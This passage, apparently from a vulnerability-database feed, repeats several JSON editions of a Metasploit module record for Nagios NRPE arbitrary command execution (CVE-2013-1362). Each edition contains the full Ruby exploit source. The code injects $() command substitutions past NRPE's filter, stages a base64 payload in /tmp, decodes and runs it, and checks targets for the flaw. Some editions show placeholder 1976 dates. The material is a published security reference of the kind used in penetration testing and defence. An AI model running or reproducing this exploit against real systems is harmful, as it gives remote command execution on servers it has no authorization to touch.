Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-01-26T14:07:32", "differentElements": ["modified", "published"], "edition": 26}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-01-26T16:05:08", "history": [], "viewCount": 61, "enchantments": {"score": {"value": 6.0, "modified": "2018-01-26T16:05:08"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-01-26T16:05:08", "differentElements": ["modified", "published"], "edition": 27}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-02T02:05:06", "history": [], "viewCount": 61, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-02T02:05:06"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-02T02:05:06", "differentElements": ["modified", "published"], "edition": 28}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-02T04:04:42", "history": [], "viewCount": 61, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-02T04:04:42"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-02T04:04:42", "differentElements": ["modified", "published"], "edition": 29}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-05T04:13:24", "history": [], "viewCount": 61, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-05T04:13:24"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-05T04:13:24", "differentElements": ["modified", "published"], "edition": 30}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-05T06:13:17", "history": [], "viewCount": 61, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-05T06:13:17"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible 